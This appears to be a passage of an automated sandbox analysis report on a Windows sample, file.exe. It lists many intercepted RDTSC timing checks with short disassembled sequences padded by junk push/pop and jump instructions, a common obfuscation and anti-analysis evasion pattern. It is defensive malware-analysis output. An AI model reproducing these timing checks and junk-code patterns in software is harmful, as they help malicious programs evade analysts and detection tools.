                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240B99 second address: 1240B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121EA4D second address: 121EA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edx 0x00000007 ja 00007F39A52A2E56h 0x0000000d jns 00007F39A52A2E56h 0x00000013 pop edx 0x00000014 pushad 0x00000015 jne 00007F39A52A2E56h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B436 second address: 128B43A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B43A second address: 128B440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B58D second address: 128B5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F39A52A77C6h 0x0000000c popad 0x0000000d jmp 00007F39A52A77D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B5B6 second address: 128B5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B717 second address: 128B720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BB3C second address: 128BB5E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F39A52A2E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F39A52A2E5Ah 0x00000013 jmp 00007F39A52A2E5Ah 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BB5E second address: 128BB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BB62 second address: 128BB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E68h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BB84 second address: 128BB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F39A52A77C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211070 second address: 1211076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211076 second address: 121107C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121107C second address: 1211087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291645 second address: 1291651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291651 second address: 1291657 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291657 second address: 129165D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291913 second address: 129193F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007F39A52A2E56h 0x0000000b jg 00007F39A52A2E56h 0x00000011 jmp 00007F39A52A2E69h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291BD7 second address: 1291BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291D24 second address: 1291D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jmp 00007F39A52A2E5Ah 0x0000000b pushad 0x0000000c jo 00007F39A52A2E56h 0x00000012 jne 00007F39A52A2E56h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129138E second address: 129139A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F39A52A77C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291FF4 second address: 1291FFE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129217D second address: 1292190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F39A52A77CEh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292190 second address: 12921B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F39A52A2E56h 0x0000000b jc 00007F39A52A2E56h 0x00000011 jmp 00007F39A52A2E5Dh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12921B1 second address: 12921CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F39A52A77CEh 0x00000008 pushad 0x00000009 jno 00007F39A52A77C6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292312 second address: 1292316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292316 second address: 1292323 instructions: 0x00000000 rdtsc 0x00000002 js 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292633 second address: 1292637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299BAC second address: 1299BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F39A52A77D4h 0x00000011 jmp 00007F39A52A77D1h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299BE7 second address: 1299C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F39A52A2E56h 0x0000000c jo 00007F39A52A2E56h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F39A52A2E56h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299C04 second address: 1299C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12985FB second address: 1298607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F39A52A2E5Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298607 second address: 129860D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129860D second address: 1298612 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298612 second address: 129861B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129861B second address: 129861F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298BEB second address: 1298BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298BF1 second address: 1298BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298BF8 second address: 1298BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298BFE second address: 1298C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298D2A second address: 1298D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CCh 0x00000007 ja 00007F39A52A77C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F39A52A77CEh 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298D53 second address: 1298D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298FD5 second address: 1298FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CBh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298FE9 second address: 1298FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298FED second address: 1299007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129914A second address: 1299150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299150 second address: 1299154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12992D2 second address: 12992E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F39A52A2E5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129943F second address: 1299445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299445 second address: 1299451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F39A52A2E56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299451 second address: 1299460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F39A52A77CEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299598 second address: 129959C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129959C second address: 12995CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A77D3h 0x0000000b pop edx 0x0000000c jng 00007F39A52A77E6h 0x00000012 jnc 00007F39A52A77C8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F39A52A77C6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12995CC second address: 12995D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F39A52A2E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12982AF second address: 12982BF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F39A52A77C6h 0x00000008 jns 00007F39A52A77C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129DA3B second address: 129DA6A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F39A52A2E71h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F39A52A2E58h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129DA6A second address: 129DA70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129DA70 second address: 129DA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0DFD second address: 12A0E07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0E07 second address: 12A0E10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0E10 second address: 12A0E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2469 second address: 12A2498 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F39A52A2E5Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F39A52A2E65h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1217D53 second address: 1217D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4FD8 second address: 12A4FFB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F39A52A2E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F39A52A2E67h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5151 second address: 12A5179 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F39A52A77D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A746C second address: 12A7476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7476 second address: 12A7498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F39A52A77C6h 0x0000000a jmp 00007F39A52A77CBh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F39A52A77CAh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEC06 second address: 12AEC24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F39A52A2E5Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEC24 second address: 12AEC2E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F39A52A77CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEC2E second address: 12AEC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEC35 second address: 12AEC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEDBD second address: 12AEDCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F39A52A2E5Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF0D0 second address: 12AF11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CAh 0x00000009 jmp 00007F39A52A77D3h 0x0000000e popad 0x0000000f jmp 00007F39A52A77D6h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F39A52A77CDh 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12585C9 second address: 12585D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12585D2 second address: 1258625 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F39A52A77C8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 sbb di, 5528h 0x0000002b mov edx, edi 0x0000002d mov ebx, dword ptr [ebp+12489613h] 0x00000033 mov cx, 9DCDh 0x00000037 add eax, ebx 0x00000039 mov edx, dword ptr [ebp+122D39A2h] 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F39A52A77CAh 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258625 second address: 125862A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125862A second address: 125865F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f movsx ecx, si 0x00000012 push 00000004h 0x00000014 mov ecx, 3DCED542h 0x00000019 mov dword ptr [ebp+122D2708h], ebx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF5E9 second address: 12AF617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E66h 0x00000007 jmp 00007F39A52A2E5Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B38F3 second address: 12B38F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B38F7 second address: 12B3917 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F39A52A2E64h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B720A second address: 12B720E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6A2B second address: 12B6A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6BA0 second address: 12B6BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6BA6 second address: 12B6BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E62h 0x00000009 jmp 00007F39A52A2E69h 0x0000000e popad 0x0000000f pushad 0x00000010 jns 00007F39A52A2E56h 0x00000016 jp 00007F39A52A2E56h 0x0000001c popad 0x0000001d push edi 0x0000001e jl 00007F39A52A2E56h 0x00000024 jg 00007F39A52A2E56h 0x0000002a pop edi 0x0000002b jbe 00007F39A52A2E5Eh 0x00000031 push edi 0x00000032 pop edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF59A second address: 12BF5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF5A0 second address: 12BF5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 js 00007F39A52A2E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD6F6 second address: 12BD6FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD8B8 second address: 12BD8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F39A52A2E5Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDCD6 second address: 12BDCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDCDA second address: 12BDCF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F39A52A2E5Ch 0x0000000d jng 00007F39A52A2E56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDCF4 second address: 12BDCFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE1EF second address: 12BE20C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F39A52A2E56h 0x00000009 jno 00007F39A52A2E56h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jmp 00007F39A52A2E5Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE51E second address: 12BE529 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F39A52A77C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE529 second address: 12BE545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d ja 00007F39A52A2E56h 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
